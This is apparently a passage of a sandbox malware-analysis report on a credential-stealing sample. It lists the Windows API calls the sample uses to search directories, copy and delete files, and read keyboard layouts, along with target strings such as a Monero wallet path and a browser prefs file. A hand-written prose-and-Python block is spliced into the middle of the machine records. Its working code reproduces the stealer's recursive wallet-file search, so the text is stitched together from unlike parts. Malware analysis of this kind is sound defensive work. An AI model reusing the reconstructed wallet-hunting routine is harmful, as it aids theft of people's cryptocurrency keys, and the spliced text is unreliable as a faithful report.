                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: b0378a1fd82377c2e766d17d1df635f750e7841b4861c5e7aef27443ac17eda1
                  • Instruction ID: 4bbc2ca69602fcf99e92f9325091e8247884e2846a97f9d46121e793a94217f9
                  • Opcode Fuzzy Hash: b0378a1fd82377c2e766d17d1df635f750e7841b4861c5e7aef27443ac17eda1
                  • Instruction Fuzzy Hash: 3FE1E671921118AAEB64FB60DC92EEE733CAF55340F4041E9B50B66452EF306FAACF51
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002C15B8,002C0D96), ref: 002AF71E
                  • StrCmpCA.SHLWAPI(?,002C15BC), ref: 002AF76F
                  • StrCmpCA.SHLWAPI(?,002C15C0), ref: 002AF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AFAB1
                  • FindClose.KERNEL32(000000FF), ref: 002AFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 50e9fe4c18702be34ad9c2b2c8b79daa93675e9de4b0bb64c26b74a4535ac448
                  • Instruction ID: c52dcdfab57d60344285b3ef724365d08e3d9831c4078853e75e74456340c840
                  • Opcode Fuzzy Hash: 50e9fe4c18702be34ad9c2b2c8b79daa93675e9de4b0bb64c26b74a4535ac448
                  • Instruction Fuzzy Hash: F4B17A71920108ABDB24FF60DD96FED7379AF55340F4086A8E40A97141EF346B69CF92
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002C510C,?,?,?,002C51B4,?,?,00000000,?,00000000), ref: 002A1923
                  • StrCmpCA.SHLWAPI(?,002C525C), ref: 002A1973
                  • StrCmpCA.SHLWAPI(?,002C5304), ref: 002A1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002A1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 002A1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002A1E20
                  • FindClose.KERNEL32(000000FF), ref: 002A1E32
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 980389f5d998049429dd0f6a17b1fe6f8e84c25a52aec50613f307a359d5df7c
                  • Instruction ID: 3d1beccd213c80ff12616944fafd4fcc877b49779d8089a228345bccf53f65b2
                  • Opcode Fuzzy Hash: 980389f5d998049429dd0f6a17b1fe6f8e84c25a52aec50613f307a359d5df7c
                  • Instruction Fuzzy Hash: B612F571930118BBDB25FB60CCA6EEE7378AF54340F404299B50A66491EF706FA9CF91
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,002C0C2E), ref: 002ADE5E
                  • StrCmpCA.SHLWAPI(?,002C14C8), ref: 002ADEAE
                  • StrCmpCA.SHLWAPI(?,002C14CC), ref: 002ADEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AE3E0
                  • FindClose.KERNEL32(000000FF), ref: 002AE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 9b2d83c18aa2ebd4b3cfbbf7c21a8f0e5ea808973fb713d2d22d11cf55d515a7
                  • Instruction ID: 9b99db297995ec6347f6c262d61ce6eec8f258f758af689759629860ebbe3974
                  • Opcode Fuzzy Hash: 9b2d83c18aa2ebd4b3cfbbf7c21a8f0e5ea808973fb713d2d22d11cf55d515a7
                  • Instruction Fuzzy Hash: 7DF18271834118AADB25FB60DCA6EEE7338BF55340F8042D9A41B66451EF306F6ACF61
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002C14B0,002C0C2A), ref: 002ADAEB
                  • StrCmpCA.SHLWAPI(?,002C14B4), ref: 002ADB33
                  • StrCmpCA.SHLWAPI(?,002C14B8), ref: 002ADB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002ADDCC
                  • FindClose.KERNEL32(000000FF), ref: 002ADDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: b4c08e636006787ff4e50a409f04753b53afdec738da59efe504affe5ecbee55
                  • Instruction ID: a62d862ed3ff053a74811fa61d5b34b82a1822a736b57f309eaf2cca5e78960e
                  • Opcode Fuzzy Hash: b4c08e636006787ff4e50a409f04753b53afdec738da59efe504affe5ecbee55
                  • Instruction Fuzzy Hash: EB913572920104A7CB14FFB0DC969ED737DAB85340F408668F91B96581EE34AB39CF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,A_z$<{N=$B"'$Vcw$X3{b$aXU$q=kU$wn{
                  • API String ID: 0-2917567846
                  • Opcode ID: ef5196566c40725f16de76132ffc063dfb81ab64a67983b1cd9f0ef65e286044
                  • Instruction ID: 16f1bc45ee9fd319a1507b331dbf50bdff5a008bdbe0b29991e267e59374b360
                  • Opcode Fuzzy Hash: ef5196566c40725f16de76132ffc063dfb81ab64a67983b1cd9f0ef65e286044
                  • Instruction Fuzzy Hash: 04B23AF390C2049FE304AE2DEC8567AFBE5EF94720F16493DEAC4C7744EA3558058696
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,002C05AF), ref: 002B7BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002B7BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 002B7C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002B7C62
                  • LocalFree.KERNEL32(00000000), ref: 002B7D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 9dd80a5f014729052c17c07fb88b9fe669442aecd14665f63842d86fa3705de8
                  • Instruction ID: 97c09a9611d25853f73fd6703234d308345ae334ee1c98267aa69b20c4711bc8
                  • Opcode Fuzzy Hash: 9dd80a5f014729052c17c07fb88b9fe669442aecd14665f63842d86fa3705de8
                  • Instruction Fuzzy Hash: F1417C71960218ABDB24DF94DC99BEEB778FF44740F2042D9E00A66281DB742F95CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !O$0b=$3]?7$4b=$7k=$yG$b>o
                  • API String ID: 0-215735701
                  • Opcode ID: 4991eb4f8c504ef3488725e5c0efb603c9be0bd74e1c08384901c5693590e7e7
                  • Instruction ID: c4cbad6dbcb72460c2edbc1465d5a1846588d1e2efa39da8af78abf8676b09a8
                  • Opcode Fuzzy Hash: 4991eb4f8c504ef3488725e5c0efb603c9be0bd74e1c08384901c5693590e7e7
                  • Instruction Fuzzy Hash: 5FB205F360C2049FE3046E29EC8567AFBE9EF94720F168A3DE6C4C7744EA3558058697
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,002C0D73), ref: 002AE4A2
                  • StrCmpCA.SHLWAPI(?,002C14F8), ref: 002AE4F2
                  • StrCmpCA.SHLWAPI(?,002C14FC), ref: 002AE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: e03e7eec867897458e484e0b5c4182b08a0f403b6f198ad8f4c0bd7243fbdd0a
                  • Instruction ID: 66545d11e749f3f397634dfcb53aff900c498a448600532cba33a44b097920ff
                  • Opcode Fuzzy Hash: e03e7eec867897458e484e0b5c4182b08a0f403b6f198ad8f4c0bd7243fbdd0a
                  • Instruction Fuzzy Hash: DB123471920114ABDB24FB60DCA7EED7378AF54340F4046A9B50B96492EF306F69CF92
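The record above (FindFirstFileA on `\*.*`, two StrCmpCA calls against adjacent string constants, FindNextFileA, and `\Monero\wallet.keys` passed to lstrlen inside a helper) has the shape of a recursive directory walk that skips the two dot entries and tests each path against a wallet-file name. The Python below is an added illustration written for this page, not code from the sample or from Joe Sandbox: it reproduces that loop over a constructed temporary directory tree. Two assumptions are marked in the comments: that the compared constants at 002C14F8 and 002C14FC are `.` and `..` (the report shows only their addresses), and that the wallet path is matched as a suffix of the full path.

```python
import os
import tempfile

# The only target path visible in the report. Matched case-insensitively as a
# suffix of the walked path (assumption: the report shows the string, not how
# the sample compares it).
WALLET_SUFFIXES = (r"\Monero\wallet.keys",)

def find_first_next(directory):
    """Yield entries the way a FindFirstFileA/FindNextFileA loop over
    "<dir>\\*.*" does: every entry, including '.' and '..', in one pass."""
    yield "."
    yield ".."
    with os.scandir(directory) as it:
        for entry in it:
            yield entry.name

def walk_like_stealc(root, targets=WALLET_SUFFIXES, depth=0, max_depth=32):
    """Recursive walk mirroring the API chain: skip '.' and '..' with a string
    compare (assumed meaning of the two StrCmpCA calls), recurse into
    subdirectories, and collect files whose path ends with a target suffix.
    Paths are normalised to backslashes before comparison."""
    hits = []
    if depth > max_depth:  # defensive bound; the report shows none in the sample
        return hits
    for name in find_first_next(root):
        if name == "." or name == "..":
            continue
        full = os.path.join(root, name)
        if os.path.isdir(full) and not os.path.islink(full):
            hits.extend(walk_like_stealc(full, targets, depth + 1, max_depth))
            continue
        win_path = full.replace("/", "\\")
        if any(win_path.lower().endswith(t.lower()) for t in targets):
            hits.append(full)
    return hits

def build_sample_tree():
    """Constructed fixture: two Monero wallet files at different depths plus decoys."""
    root = tempfile.mkdtemp(prefix="stealc_walk_")
    os.makedirs(os.path.join(root, "Monero"))
    os.makedirs(os.path.join(root, "Documents", "Monero"))
    os.makedirs(os.path.join(root, "empty"))
    for rel in ("Monero/wallet.keys", "Documents/Monero/wallet.keys",
                "Monero/wallet.txt", "notes.txt"):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(b"constructed sample content")
    return root

if __name__ == "__main__":
    for hit in walk_like_stealc(build_sample_tree()):
        print(hit)
```

Run it and the two `wallet.keys` files are reported while `wallet.txt`, `notes.txt` and the empty directory are not; on a real host the same loop would be rooted at the user profile, which is where the `\*.*` wildcard argument points it.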
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .g~y$1y_$5BW$qyfw${9'Y$xp|
                  • API String ID: 0-1380446244
                  • Opcode ID: 136654db9ec02e23c89b9af4cd7ed1619f58f2ed3ea160f5a0b70c200e1193b8
                  • Instruction ID: ed643d89f0a797e3ec6ced383b65b81b104cfaf7311fa2f0e43a4a06fc41a529
                  • Opcode Fuzzy Hash: 136654db9ec02e23c89b9af4cd7ed1619f58f2ed3ea160f5a0b70c200e1193b8
